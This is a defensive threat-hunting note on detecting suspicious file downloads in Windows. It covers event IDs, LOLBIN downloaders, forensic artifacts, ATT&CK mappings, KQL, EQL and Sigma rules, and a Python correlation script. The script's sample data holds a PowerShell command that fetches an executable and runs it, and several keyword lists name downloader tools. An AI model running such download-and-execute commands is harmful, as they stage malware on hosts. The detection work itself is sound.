This note documents detection patterns related to Suspicious Downloading within Windows environments.
Direct Indicators
| Log | Event ID | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Security | 4688 | Process creation | Critical | Detects LOLBIN or script-based download commands. |
| Sysmon | 1 | Process creation | Critical | Best execution source for downloader tooling and command line. |
| Sysmon | 3 | Network connection | Critical | Shows outbound connections tied to downloader process. |
| Sysmon | 11 | File create | Critical | Captures downloaded payload landing on disk. |
| Sysmon | 22 | DNS query | High | Reveals remote host resolution before retrieval. |
| PowerShell | 4104 | Script block logging | Critical | Captures Invoke-WebRequest, WebClient, DownloadString. |
| Security | 5156 | Windows Filtering Platform allowed connection | High | Network-level confirmation. |
| Sysmon | 7 | Image loaded | Medium | Useful when downloader loads network libraries unexpectedly. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| LOLBIN downloader | certutil, bitsadmin, mshta, rundll32 | Critical | Strong attacker pattern. |
| Script retrieves EXE/DLL/ZIP | File extension from suspicious source | Critical | Payload staging. |
| Browserless download | No browser parent process | High | Suspicious automation. |
| Temp folder payload | File lands in Temp / Public / AppData | Critical | Common attacker path. |
| Immediate execution after download | Child process follows file create | Critical | Classic stage-two chain. |
| Encoded PowerShell retrieval | Base64 + network call | Critical | Fileless staging indicator. |
| External IP or rare domain | Unusual destination | High | Strong enrichment pivot. |
| CryptnetUrlCache artifacts | AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | High | Traces of certutil usage. |
Common Tools
| Tool | Usage |
|---|---|
| PowerShell | Invoke-WebRequest, WebClient, DownloadString |
| certutil.exe | Download / decode payload |
| bitsadmin.exe | Background transfer |
| curl.exe | Native file retrieval |
| wget.exe | Linux-style retrieval on Windows |
| mshta.exe | Remote HTA retrieval |
| rundll32.exe | Remote script or DLL retrieval |
| browser automation | Payload fetch via browser engine |
Relevant Artifacts
- Sysmon Event IDs 1, 3, 11, 22
- Security Event ID 4688
- PowerShell 4104
- Security 5156
- Prefetch: POWERSHELL.EXE, CERTUTIL.EXE, BITSADMIN.EXE, CURL.EXE
- Amcache for downloaded payload
- ShimCache for execution chain
- MFT / USN Journal for file creation
- Browser cache if browser involved
- Zone.Identifier ADS
- EDR network lineage
MITRE ATT&CK References
- T1105 Ingress Tool Transfer
- T1059 PowerShell
- T1218 Signed Binary Proxy Execution
- T1071 Application Layer Protocol
Decision Tree
- Which process downloaded the file?
  - Parent process
  - Command line
- Network destination?
  - Domain
  - IP
  - Reputation
- Where did the file land?
  - Temp
  - AppData
  - Public
- Was the file executed?
  - Child process
  - DLL load
  - Service/task registration
- Expand:
  - Persistence
  - Additional downloads
  - Beaconing
- Scope:
  - Single host
  - Campaign spread
  - Shared IOC
Example Detection Templates
KQL
```kusto
Sysmon
| where EventID == 1
| where CommandLine has_any ("Invoke-WebRequest","DownloadString","certutil","bitsadmin","curl ")
| project TimeGenerated, Computer, User, CommandLine
```
```kusto
Sysmon
| where EventID == 3
| project TimeGenerated, Computer, Image, DestinationIp, DestinationHostname
```
EQL
```eql
process where process.command_line like "*Invoke-WebRequest*" or process.command_line like "*certutil*"
```
```eql
// EQL wildcards are "*", not SQL-style "%"
sequence by host.name with maxspan=5m
  [ process where process.name in ("powershell.exe","certutil.exe","bitsadmin.exe") ]
  [ file where file.path like "C:\\Users\\*\\AppData\\*" ]
```
Sigma
```yaml
title: Suspicious Download Activity
id: 4a8d77e1-suspicious-download
status: experimental
description: Detects suspicious file retrieval using common attacker tooling
references:
  - https://attack.mitre.org/
author: Vergil
date: 2026-03-07
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadString'
      - 'certutil'
      - 'bitsadmin'
      - 'curl '
  condition: selection
fields:
  - CommandLine
  - ParentImage
falsepositives:
  - Administrative downloads
level: high
tags:
  - attack.command_and_control
  - attack.t1105
```
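The templates above each catch one link of the chain; the "immediate execution after download" indicator needs correlation across Sysmon Event 1 (downloader), Event 11 (file lands in a staging folder) and a later Event 1 (that file runs). The Python below is an added example written for this note, not a template from the original page: it runs that correlation over constructed Sysmon-style records (field names follow the Sysmon schema; the events, GUIDs and host are made up), with the same five-minute window as the EQL sequence.

```python
from datetime import datetime, timedelta

# Constructed sample events: PowerShell fetches a file into AppData,
# then the downloaded file is launched 17 seconds later.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-03-07 10:00:00", "ProcessGuid": "{p1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest http://example.invalid/a.exe -OutFile a.exe"},
    {"EventID": 11, "UtcTime": "2026-03-07 10:00:03", "ProcessGuid": "{p1}",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\a.exe"},
    {"EventID": 1, "UtcTime": "2026-03-07 10:00:20", "ProcessGuid": "{p2}",
     "ParentProcessGuid": "{p1}", "Image": r"C:\Users\alice\AppData\Roaming\a.exe",
     "CommandLine": r"C:\Users\alice\AppData\Roaming\a.exe"},
]

# Same tokens as the KQL/Sigma templates, plus the staging folders from the decision tree.
DOWNLOADER_TOKENS = ("invoke-webrequest", "downloadstring", "certutil", "bitsadmin", "curl ")
STAGING_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def is_downloader_cmd(cmdline):
    c = cmdline.lower()
    return any(tok in c for tok in DOWNLOADER_TOKENS)

def in_staging_dir(path):
    p = path.lower()
    return any(d in p for d in STAGING_DIRS)

def detect_download_chain(events, maxspan=timedelta(minutes=5)):
    """Return one finding per downloader -> staged file -> execution chain within maxspan."""
    downloaders = {}  # ProcessGuid -> Event 1 of the downloader process
    staged = {}       # lower-cased payload path -> Event 11 that created it
    findings = []
    for ev in sorted(events, key=lambda e: _ts(e["UtcTime"])):
        if ev["EventID"] == 1 and is_downloader_cmd(ev.get("CommandLine", "")):
            downloaders[ev["ProcessGuid"]] = ev
        elif ev["EventID"] == 11 and ev["ProcessGuid"] in downloaders:
            if in_staging_dir(ev["TargetFilename"]):
                staged[ev["TargetFilename"].lower()] = ev
        elif ev["EventID"] == 1 and ev.get("Image", "").lower() in staged:
            fc = staged[ev["Image"].lower()]
            if _ts(ev["UtcTime"]) - _ts(fc["UtcTime"]) <= maxspan:
                findings.append({"downloader": downloaders[fc["ProcessGuid"]]["CommandLine"],
                                 "payload": ev["Image"], "executed_at": ev["UtcTime"]})
    return findings

if __name__ == "__main__":
    for f in detect_download_chain(SAMPLE_EVENTS):
        print(f)
```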
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| PowerShell logging | Enable 4104 | Critical | Core visibility |
| LOLBIN monitoring | Alert on downloader binaries | Critical | Detect staging early |
| Network controls | Restrict outbound retrieval | High | Reduce payload ingress |
| ADS inspection | Monitor Zone.Identifier | High | Browserless anomalies stand out |
| AppLocker / WDAC | Restrict unsigned payload execution | High | Limits stage-two execution |